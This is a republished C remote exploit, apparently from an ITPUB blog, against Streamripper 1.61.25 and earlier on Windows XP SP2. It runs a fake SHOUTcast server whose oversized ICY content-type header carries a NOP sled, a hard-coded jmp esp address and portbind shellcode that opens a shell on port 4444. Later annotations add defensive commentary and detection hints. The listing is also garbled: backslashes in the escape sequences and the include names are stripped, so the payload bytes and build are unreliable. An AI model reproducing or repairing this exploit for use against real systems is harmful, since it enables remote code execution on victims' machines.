Streamripper

/*
* name: streamripper <= 1.61.25 win32 remote exploit
*
* bug by: Ulf Harnhammar
* status: public
* exploit: psylocn
* payload: portbind 4444
* **********************************************************
* K:>exploit.exe 80 0
* [ public-release ]
* streamripper <= 1.61.25 remote exploit
* exploit by psylocn 2006
* bug by Ulf Harnhammar
*
* [+] server started!
* [+] server waits
*
*
* go to next shell
* K:>streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/

/* #define _WIN32 */

#include
#include
#include

#ifdef _WIN32
#include
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#endif

/* portbind shellcode port 4444*/
/* Payload bytes as published, treated as opaque here. Note that every escape
 * sequence in this listing lost its backslash when the page was published
 * ("x29xc9", "rn"), so the literals below are NOT the bytes the original author
 * shipped: as shown, this is a plain ASCII string, not an executable payload.
 * For a defender the literal is only useful as a signature source for this PoC. */
unsigned char portbindsc[] =
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xaf"
"xbfxf8x2ax83xebxfcxe2xf4x53xd5x13x67x47x46x07xd5"
"x50xdfx73x46x8bx9bx73x6fx93x34x84x2fxd7xbex17xa1"
"xe0xa7x73x75x8fxbex13x63x24x8bx73x2bx41x8ex38xb3"
"x03x3bx38x5exa8x7ex32x27xaex7dx13xdex94xebxdcx02"
"xdax5ax73x75x8bxbex13x4cx24xb3xb3xa1xf0xa3xf9xc1"
"xacx93x73xa3xc3x9bxe4x4bx6cx8ex23x4ex24xfcxc8xa1"
"xefxb3x73x5axb3x12x73x6axa7xe1x90xa4xe1xb1x14x7a"
"x50x69x9ex79xc9xd7xcbx18xc7xc8x8bx18xf0xebx07xfa"
"xc7x74x15xd6x94xefx07xfcxf0x36x1dx4cx2ex52xf0x28"
"xfaxd5xfaxd5x7fxd7x21x23x5ax12xafxd5x79xecxabx79"
"xfcxecxbbx79xecxecx07xfaxc9xd7xe9x76xc9xecx71xcb"
"x3axd7x5cx30xdfx78xafxd5x79xd5xe8x7bxfax40x28x42"
"x0bx12xd6xc3xf8x40x2ex79xfax40x28x42x4axf6x7ex63"
"xf8x40x2ex7axfbxebxadxd5x7fx2cx90xcdxd6x79x81x7d"
"x50x69xadxd5x7fxd9x92x4exc9xd7x9bx47x26x5ax92x7a"
"xf6x96x34xa3x48xd5xbcxa3x4dx8ex38xd9x05x41xbax07"
"x51xfdxd4xb9x22xc5xc0x81x04x14x90x58x51x0cxeexd5"
"xdaxfbx07xfcxf4xe8xaax7bxfexeex92x2bxfexeexadx7b"
"x50x6fx90x87x76xbax36x79x50x69x92xd5x50x88x07xfa"
"x24xe8x04xa9x6bxdbx07xfcxfdx40x28x42x5fx35xfcx75"
"xfcx40x2exd5x7fxbfxf8x2axccxccxccxccxccxccxccxcc";

/* First half of a fake SHOUTcast/ICY response. It deliberately ends in an open
 * "content-type:" header: main() fills the rest of the buffer after it, so the
 * value of that header becomes thousands of bytes long. That oversized header
 * line is the trigger named by the page ("buffer to exploit") and the thing a
 * protocol-aware detection should key on. The literal is split across two
 * physical lines in this listing (extraction artefact); the "rn" fragments are
 * the de-escaped CRLF terminators. */
char part1[] = "ICY 200 OKrnicy-notice1:aaaaarn"
"icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7
rn"
"icy-name:Radioseven - www.radio.dern"
"icy-genre:Dance Trance Housern"
"icy-url:http://www.radio.dern"
"content-type:"; //buffer to exploit

/* Tail of the response: closes the content-type line and ends the header block
 * with the blank line. main() copies it with sizeof(), i.e. including its NUL. */
char part2[] = "rn"
"icy-pub:1rn"
"icy-metaint:8192rn"
"icy-br:CCCCCCCrnrn";

/* Small stack-adjust stub placed before the payload; the author's comment is the
 * only description available. Same lost-backslash caveat as portbindsc. */
char fixstack[] = "x81xc4xffxefxffxffx44"; //sub esp, 4097 + inc esp

/* Target table indexed by argv[2]. jmpaddr is a single hard-coded address for one
 * specific OS build (labelled "jmp esp" by the author); entry 1 is a 0x41414141
 * placeholder used for debugging. jmpaddr is declared long, but main() copies
 * exactly 4 bytes of it, which assumes a 32-bit little-endian long (Win32). */
struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
{ 1, "debug [testing] ", 0x41414141 },
};

/* Print the command-line usage and the target table to stdout/stderr, then
 * exit(1). Never returns.
 * Notes:
 *  - target[i].name is a char[50], so `target[i].name != 0` is always true and
 *    the `else break;` branch is unreachable; the loop relies solely on the
 *    literal bound 2 matching the number of entries in target[].
 *  - `Usage()` with an empty parameter list is an unprototyped declaration;
 *    `void Usage(void)` is the modern form.
 *  - exit() needs <stdlib.h> and printf/fprintf <stdio.h>; the include names
 *    were stripped from this listing, so this file does not build as shown. */
void Usage(){

int i;
printf("Usage: exploit.exe port targetnn"
"Targets:nn");
for (i = 0; i < 2; i++)
{
if(target[i].name != 0)
fprintf(stderr," [%u] %sn",i,target[i].name);
else
break;
}
exit(1);
}

/*
 * Entry point: exploit.exe <port> <target-index>.
 * Acts as a fake SHOUTcast/ICY server: binds <port> on all interfaces, blocks in
 * accept() until one client (the streamripper under test) connects, sends a
 * single crafted ICY response assembled from part1 + 0x90 filler +
 * target[].jmpaddr + fixstack + portbindsc + part2, then exits. Because the
 * victim is the one that connects out, a defender should look at the inbound
 * ICY *response*: one header line ("content-type:") thousands of bytes long,
 * mostly 0x90, is the observable artefact.
 *
 * Portability notes (as written, only the _WIN32 branch can be expected to
 * build):
 *  - SOCKET_ERROR, INVALID_SOCKET and closesocket() are Winsock names; the
 *    #else include branch provides no replacements for them.
 *  - sleep(2000) reads like Win32 Sleep() milliseconds; POSIX sleep() takes
 *    seconds, so the same line would wait ~33 minutes there.
 *  - sin_size is an int; POSIX accept() expects a socklen_t *.
 *  - Every escape sequence in the string literals ("n", "rn") lost its
 *    backslash when the listing was published, so neither the printed output
 *    nor the buffer contents are what the author shipped.
 * Every failure path returns 0, so the exit status never signals an error.
 */
int main (int argc, char **argv) {

char *host;                          // unused
struct sockaddr_in my_addr;          // listening address
struct sockaddr_in their_addr;       // peer address filled in by accept()
int sockfd,port,new_sock,sin_size=sizeof (their_addr);

char buffer[3565];                   // the whole crafted response; 3564 bytes are sent

#ifdef _WIN32
WSADATA wsa;
#endif

#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);     // return value not checked
#endif

printf("[ public-release ]n");
printf("tstreamripper <= 1.61.25 remote exploit n");
printf("texploit by psylocn 2006n");
printf("tbug by Ulf Harnhammarnn");

unsigned long ntarget = 0;
if (argc < 3) Usage();
/* ntarget is unsigned long, so a negative argv[2] becomes a huge value and is
 * also rejected by the > 1 test; only indices 0 and 1 reach target[]. */
if ((ntarget = atoi(argv[2])) > 1) Usage();

/* Truncated to 16 bits; atoi() gives no parse or range error. */
port = (unsigned short)atoi(argv[1]);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket errorn");
return 0;
}

my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr = INADDR_ANY;  // listens on every interface, not just loopback

/* `struct my_addr` is never declared; the cast only compiles because a pointer
 * to an incomplete type is legal, and it is an incompatible pointer type for
 * bind(). The intended type is struct sockaddr *. */
if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
printf("n[-] bind errorn");
return 0;
}
else printf ("[+] server started!n");

if (listen (sockfd, 3) == SOCKET_ERROR) {
printf("n[-] listen errorn");
return 0;
}
printf ("[+] server waitsn");

/* Blocks until the first client connects; that client is the only one served. */
if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
printf("n[-] accept errorn");
return 0;
}
else
printf ("[+] client conneted!n");

/* Fill with 0x90 (x86 NOP), the filler between part1 and the offsets below.
 * A long run of 0x90 inside an ICY header is itself a strong detection signal. */
memset ( buffer, 0x90, sizeof(buffer) - 1 );
memcpy ( buffer, part1, strlen(part1) );
/* Offsets 3146/3150/3515 are the author's layout constants for the target
 * build and cannot be re-derived from this page. Only 4 of jmpaddr's bytes are
 * copied (see the struct comment). strlen() on portbindsc stops at the first
 * 0x00 byte, so the payload is assumed to be NUL-free. */
memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
memcpy ( buffer+3150, fixstack,strlen(fixstack) );
memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));

/* sizeof(part2) includes its terminating NUL; with the author's original
 * escape sequences this presumably lands exactly on buffer[3564], the byte
 * that send() below excludes — not verifiable from the mangled listing. */
memcpy ( buffer+3515, part2, sizeof(part2) );

/* One send() for the whole response; a short send is not detected. */
if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
printf("[-] send errorn");
return 0;
}
sleep(2000);
printf("[+] exploit send check shell on port 4444n");

closesocket(sockfd);                 // new_sock is never closed explicitly
#ifdef _WIN32
WSACleanup ();
#endif
return 0;
}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-861820/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/83980/viewspace-861820/
